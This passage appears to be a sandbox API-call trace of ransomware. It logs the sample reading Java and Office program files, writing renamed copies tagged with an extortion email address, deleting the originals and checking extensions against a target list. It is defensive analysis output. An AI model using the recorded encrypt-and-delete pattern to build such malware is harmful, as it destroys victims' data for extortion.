lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.010] WriteFile (in: hFile=0x348, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x102, lpOverlapped=0x0) returned 1 [0057.010] SetEndOfFile (hFile=0x348) returned 1 [0057.010] CloseHandle (hObject=0x348) returned 1 [0057.011] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.011] SetEndOfFile (hFile=0x358) returned 1 [0057.012] CloseHandle (hObject=0x358) returned 1 [0057.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.012] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_movedrop32x32.gif")) returned 1 [0057.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.013] lstrlenW (lpString=".doc") returned 4 [0057.013] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0057.013] lstrlenW (lpString=".docx") returned 5 [0057.013] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0057.013] lstrlenW (lpString=".pdf") returned 4 [0057.013] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0057.013] lstrlenW (lpString=".xls") returned 4 [0057.013] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0057.013] lstrlenW (lpString=".xlsx") returned 5 [0057.013] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0057.013] lstrlenW (lpString=".ppt") returned 4 [0057.013] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0057.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.013] lstrlenW (lpString=".zip") returned 4 [0057.013] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0057.014] lstrlenW (lpString=".rar") returned 4 [0057.014] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0057.014] lstrlenW (lpString=".bz2") returned 4 [0057.014] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0057.014] lstrlenW (lpString=".7z") returned 3 [0057.014] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0057.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.014] lstrlenW (lpString=".dbf") returned 4 [0057.014] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0057.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.014] lstrlenW (lpString=".1cd") returned 4 [0057.014] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0057.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.014] lstrlenW (lpString=".jpg") returned 4 [0057.014] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0057.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.014] lstrlenW (lpString=".doc") returned 4 [0057.014] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0057.014] lstrlenW (lpString=".docx") returned 5 [0057.014] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0057.014] lstrlenW (lpString=".pdf") returned 4 [0057.014] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0057.014] lstrlenW (lpString=".xls") returned 4 [0057.014] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0057.014] lstrlenW (lpString=".xlsx") returned 5 [0057.014] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0057.015] lstrlenW (lpString=".ppt") returned 4 [0057.015] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0057.015] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.015] lstrlenW (lpString=".zip") returned 4 [0057.015] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0057.015] lstrlenW (lpString=".rar") returned 4 [0057.015] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0057.015] lstrlenW (lpString=".bz2") returned 4 [0057.015] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0057.015] lstrlenW (lpString=".7z") returned 3 [0057.015] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0057.015] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.015] lstrlenW (lpString=".dbf") returned 4 [0057.015] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0057.015] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.015] lstrlenW (lpString=".1cd") returned 4 [0057.015] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0057.015] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_MoveDrop32x32.gif") returned 77 [0057.015] lstrlenW (lpString=".jpg") returned 4 [0057.015] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0057.015] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0057.015] lstrlenW (lpString="tzdb.dat") returned 8 [0057.015] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0057.022] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=105500) returned 1 [0057.022] CloseHandle (hObject=0x354) returned 1 [0057.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat")) returned 0x20 [0057.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.022] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0057.022] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.022] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.022] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0057.023] GetLastError () returned 0x0 [0057.023] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x19c1c, lpOverlapped=0x0) returned 1 [0057.042] WriteFile (in: hFile=0x2e4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x19c20, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x19c20, lpOverlapped=0x0) returned 1 [0057.045] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0057.045] WriteFile (in: hFile=0x2e4, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0057.045] SetEndOfFile (hFile=0x2e4) returned 1 [0057.045] CloseHandle (hObject=0x2e4) returned 1 [0057.048] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.048] SetEndOfFile (hFile=0x354) returned 1 [0057.716] CloseHandle (hObject=0x354) returned 1 [0057.716] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0057.716] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat")) returned 1 [0057.716] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.716] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.716] lstrlenW (lpString=".doc") returned 4 [0057.717] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0057.717] lstrlenW (lpString=".docx") returned 5 [0057.717] lstrcmpiW (lpString1=".docx", lpString2="b.dat") returned -1 [0057.717] lstrlenW (lpString=".pdf") returned 4 [0057.717] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0057.717] lstrlenW (lpString=".xls") returned 4 [0057.717] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0057.717] lstrlenW (lpString=".xlsx") returned 5 [0057.717] lstrcmpiW (lpString1=".xlsx", lpString2="b.dat") returned -1 [0057.717] lstrlenW (lpString=".ppt") returned 4 [0057.717] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0057.717] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.717] lstrlenW (lpString=".zip") returned 4 [0057.717] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0057.717] lstrlenW (lpString=".rar") returned 4 [0057.717] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0057.717] lstrlenW (lpString=".bz2") returned 4 [0057.717] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0057.717] lstrlenW (lpString=".7z") returned 3 [0057.717] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0057.717] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.717] lstrlenW (lpString=".dbf") returned 4 [0057.717] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0057.717] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.717] lstrlenW (lpString=".1cd") returned 4 [0057.717] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0057.717] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.717] lstrlenW (lpString=".jpg") returned 4 [0057.717] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.718] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.718] lstrlenW (lpString=".doc") returned 4 [0057.718] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString=".docx") returned 5 [0057.718] lstrcmpiW (lpString1=".docx", lpString2="b.dat") returned -1 [0057.718] lstrlenW (lpString=".pdf") returned 4 [0057.718] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString=".xls") returned 4 [0057.718] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString=".xlsx") returned 5 [0057.718] lstrcmpiW (lpString1=".xlsx", lpString2="b.dat") returned -1 [0057.718] lstrlenW (lpString=".ppt") returned 4 [0057.718] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.718] lstrlenW (lpString=".zip") returned 4 [0057.718] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString=".rar") returned 4 [0057.718] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString=".bz2") returned 4 [0057.718] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0057.718] lstrlenW (lpString=".7z") returned 3 [0057.718] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0057.718] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.718] lstrlenW (lpString=".dbf") returned 4 [0057.718] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0057.718] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.718] lstrlenW (lpString=".1cd") returned 4 [0057.718] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0057.719] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0057.719] lstrlenW (lpString=".jpg") returned 4 [0057.719] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0057.719] lstrcmpiW (lpString1=".HTM", lpString2=".bat") returned 1 [0057.719] lstrlenW (lpString="OSPP.HTM") returned 8 [0057.719] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0057.720] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=174528) returned 1 [0057.720] CloseHandle (hObject=0x354) returned 1 [0057.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm")) returned 0x20 [0057.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0057.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0057.720] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.720] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0057.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0057.958] GetLastError () returned 0x0 [0057.958] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2a9c0, lpOverlapped=0x0) returned 1 [0058.179] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2a9d0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2a9d0, lpOverlapped=0x0) returned 1 [0058.182] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.182] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0058.182] SetEndOfFile (hFile=0x344) returned 1 [0058.182] CloseHandle (hObject=0x344) returned 1 [0058.185] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.185] SetEndOfFile (hFile=0x354) returned 1 [0058.187] CloseHandle (hObject=0x354) returned 1 [0058.187] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0058.187] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM" (normalized: "c:\\program files\\microsoft office\\office16\\ospp.htm")) returned 1 [0058.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.187] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.187] lstrlenW (lpString=".doc") returned 4 [0058.187] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0058.188] lstrlenW (lpString=".docx") returned 5 [0058.188] lstrcmpiW (lpString1=".docx", lpString2="P.HTM") returned -1 [0058.188] lstrlenW (lpString=".pdf") returned 4 [0058.188] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0058.188] lstrlenW (lpString=".xls") returned 4 [0058.188] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0058.188] lstrlenW (lpString=".xlsx") returned 5 [0058.188] lstrcmpiW (lpString1=".xlsx", lpString2="P.HTM") returned -1 [0058.188] lstrlenW (lpString=".ppt") returned 4 [0058.188] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0058.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.188] lstrlenW (lpString=".zip") returned 4 [0058.188] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0058.188] lstrlenW (lpString=".rar") returned 4 [0058.188] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0058.188] lstrlenW (lpString=".bz2") returned 4 [0058.188] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0058.188] lstrlenW (lpString=".7z") returned 3 [0058.188] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0058.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.188] lstrlenW (lpString=".dbf") returned 4 [0058.188] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0058.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.188] lstrlenW (lpString=".1cd") returned 4 [0058.188] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0058.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.188] lstrlenW (lpString=".jpg") returned 4 [0058.188] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0058.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.188] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.188] lstrlenW (lpString=".doc") returned 4 [0058.188] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0058.188] lstrlenW (lpString=".docx") returned 5 [0058.188] lstrcmpiW (lpString1=".docx", lpString2="P.HTM") returned -1 [0058.188] lstrlenW (lpString=".pdf") returned 4 [0058.188] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0058.189] lstrlenW (lpString=".xls") returned 4 [0058.189] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0058.189] lstrlenW (lpString=".xlsx") returned 5 [0058.189] lstrcmpiW (lpString1=".xlsx", lpString2="P.HTM") returned -1 [0058.189] lstrlenW (lpString=".ppt") returned 4 [0058.189] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0058.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.189] lstrlenW (lpString=".zip") returned 4 [0058.189] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0058.189] lstrlenW (lpString=".rar") returned 4 [0058.189] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0058.189] lstrlenW (lpString=".bz2") returned 4 [0058.189] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0058.189] lstrlenW (lpString=".7z") returned 3 [0058.189] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0058.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.189] lstrlenW (lpString=".dbf") returned 4 [0058.189] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0058.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.189] lstrlenW (lpString=".1cd") returned 4 [0058.189] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0058.189] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office16\\OSPP.HTM") returned 51 [0058.189] lstrlenW (lpString=".jpg") returned 4 [0058.189] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0058.189] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0058.189] lstrlenW (lpString="AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml") returned 53 [0058.189] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.190] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2d0ff14 | out: lpFileSize=0x2d0ff14*=1261) returned 1 [0058.190] CloseHandle (hObject=0x354) returned 1 [0058.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml")) returned 0x220 [0058.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0058.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0058.190] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.190] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.190] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0409-1000-0000000ff1ce.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0058.191] GetLastError () returned 0x0 [0058.191] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0058.229] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0058.230] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0058.230] WriteFile (in: hFile=0x344, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13e, lpOverlapped=0x0) returned 1 [0058.230] SetEndOfFile (hFile=0x344) returned 1 [0058.230] CloseHandle (hObject=0x344) returned 1 [0058.231] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0058.231] SetEndOfFile (hFile=0x354) returned 1 [0058.233] CloseHandle (hObject=0x354) returned 1 [0058.233] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 